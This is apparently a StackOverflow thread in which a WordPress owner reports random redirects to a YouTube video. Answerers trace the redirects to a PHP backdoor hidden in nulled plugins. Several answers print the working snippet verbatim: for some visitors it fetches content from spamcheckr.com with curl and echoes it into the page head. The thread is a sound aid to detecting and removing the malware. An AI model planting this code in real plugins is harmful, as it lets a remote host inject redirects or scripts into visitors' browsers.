WordPress blog infected with HTML Refresh meta tag

Question

Hello StackOverflow community. I have a very interesting (at my opinion) infection to share with you today.

4-5 days ago I realized that my blog's homepage after some seconds of loading was redirected to another page. Specifically to youtube, at a Justin Bieber video. I thought it was my computer's problem, so I scanned or viruses and malware. But it wasn't my fault.

Finally I was sure that it was not a local problem because Google pagespeed insights had the same result.

So, after many hours of research (and some broken keyboards) I found out those clues. In details:

A meta tag was created inside my header similar to this:

<meta http-equiv="refresh" content="0; url=http://www.youtube.com/watch?v=RFngSCaY5nA">

First, I disabled all my plugins but without result. After a while the problem was still there. Second, I searched all my database tables to find out if the URL of the video was included somewhere, but it wasn't. Then I searched in my template editor one by one the php files, but nothing. .htaccess was also clear (not 100% sure what I was looking for in there, but I think there was nothing suspicious).

After all these, I downloaded via FTP my whole site, and searched inside every file for this URL. I found that it was included to some HTML files of the CACHE folder. I use W3 Total Cache for that purpose. I deleted the whole cache folder, but after a while the problem was still there.

The fun fact here is that this "virus" is not always active. It appears at random time, at different page each time. Also tonight I realized that it appeared on a second computer, the same time that everything looked fine on my computer.

The Youtube Video URL is: http:// www.youtube.com/watch?v=RFngSCaY5nA

So my question is: Does anyone of you have a solution to recommend before deleting the whole installation and start from the beginning? Does anyone else had the same problem wit me in the past?

I think that's all l have to share. I'm sorry for the long post, tried to be as detailed as possible. I'm not good at coding, this is my first attempt to run a WordPress site so, there might be something that I forgot.

Thanks in advance.

Answer 1

I have the same problem and think I found the solution! Check your site files for this link: http://spamcheckr.com/l.php I found this link in formcraft plugin.

Like this:

if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}

Edited: Also check for this: http://spamcheckr.com/req.php

Answer 2

I have found this script in the wordpress fooboxV2 plugin.(FooBox) Plugin official url is http://fooplugins.com/plugins/foobox/

This is the script file path /wp-content/plugins/fooboxV2/includes/foolic_class.php

You can see whole scripts are commented.But I found this code in that commented code.

<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_hhesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_hhesk');}} ?>

Answer 3

If you are using a nulled version of Gravity Forms you might also get this redirection problem. To solve the problem go to /plugins/gravityforms/settings/setting.php and remove the following code:

<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_cahesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_cahesk');}} ?>

Good luck.

Answer 4

Good answer above. To add to it, I recommend using grep to anyone who has trouble searching for the code :

grep -nr 'http://spamcheckr.com/l.php' /www/wordpress/wp-content

If you don't have grep and cant access your server (windows users) download it or use findstr :

findstr /s /i /p "http://spamcheckr.com/l.php" /www/wordpress/wp-content

(Dont forget to change /www/wordpress/wp-content to the location or your wordpress folders

Answer 5

Found it, too. In my case I was using an apparently nulled plug-in (which I didn't realize). It's called woocommerce-checkout-field-editor and was injecting a link to a Justin Bieber youtube video.

The function looks like this and is was hidden in \wp-content\plugins\woocommerce-checkout-field-editor\assets\js\class.php:

if (mt_rand(0,99) == 1) {
function sec_check() {
    if(function_exists('curl_init'))    
    {
        $url = "spamcheckr.com/req.php";
        $ch = curl_init();
        $timeout = 5;
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
        $data = curl_exec($ch);
        curl_close($ch);
        echo "$data";
    }
}
add_action('wp_head','sec_check');

}

As we can see, it only displays the spam when a random function hits '1'. Then, it politely asks to see if curl is installed and then sends a simple GET request to the spam server to see what code it should be injecting.

The site is spamcheckr.com.

It then adds itself into the WordPress header and redirects the viewer of the page.

I reported the site to their host and let's see what happens.